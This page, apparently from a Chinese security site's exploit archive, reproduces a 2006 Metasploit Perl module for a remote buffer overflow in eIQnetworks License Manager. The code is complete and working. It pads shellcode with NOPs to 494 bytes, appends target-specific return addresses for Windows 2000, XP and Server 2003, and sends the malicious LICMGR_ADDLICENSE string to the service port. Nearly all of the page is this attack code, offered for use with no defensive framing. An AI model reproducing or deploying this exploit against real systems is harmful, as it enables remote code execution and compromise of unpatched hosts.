首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
eIQnetworks License Manager Remote Buffer Overflow Exploit (494)
来源:ri0t@ri0tnet.net 作者:ri0t 发布时间:2006-07-27  

#!/usr/bin/perl -w

#metasploit module for EIQ Licence manager overflow Provided by ri0t of Bastard Labs

package Msf::Exploit::EiQ_License_494;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
{
'Name' => 'EIQ License Manager Overflow',
'Authors' => [ 'ri0t ri0t@ri0tnet.net, KF kf_list@digitalmunition.com' ],

'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp' ],
'Priv' => 0,

'AutoOpts' => { 'EXITFUNC' => 'seh' },

'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 10616],
},
'Payload' =>
{
'Space' => 494,
'BadChars' => "\x00\x0a\x0d\x40\x26",
},
'Description' => Pex::Text::Freeform(qq{
This module exploits the buffer overflow found in the LICMGR_ADDLICENSE
Field of EIQ networks network analyser this module exploits buffers of 494 bytes
in size. This module should work on all EIQ branded analysers. Exploitation
assistance from KF.
}),


'DefaultTarget' => 1,
'Targets' =>
[
['Windows 2000 SP0-SP4 English', 0x750316e2], # call ebx
['Windows XP SP1/SP2 English', 0x77db64dc ], # jmp ebx
['Windows Server 2003 SP0/SP1 English', 0x77d16764 ], # jmp ebx
],

};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
my $nops = $self->MakeNops(494 - length($shellcode));
my $ret = pack("V", $target->[1]);
my $evil = "LICMGR_ADDLICENSE&" . $nops . $shellcode . $ret . "&";


my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
);

if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using return address 0x%.8x....", $target->[1]));

$s->Send("$evil");
return;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·eIQnetworks License Manager Re
·AIM Triton 1.0.4 (SipXtapi) Re
·libmikmod <= 3.2.2 (GT2 loa
·eIQnetworks ESA (Syslog Server
·Etomite CMS <= 0.6.1 (rfile
·eIQnetworks License Manager Re
·Etomite CMS <= 0.6.1 (usern
·vbPortal 3.0.2 <= 3.6.0 b1
·Solaris <= 10 sysinfo() Loc
·ATutor <= 1.5.3.1 (links) R
·X7 Chat <= 2.0.4 (old_prefi
·Open Cubic Player <= 2.6.0p
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved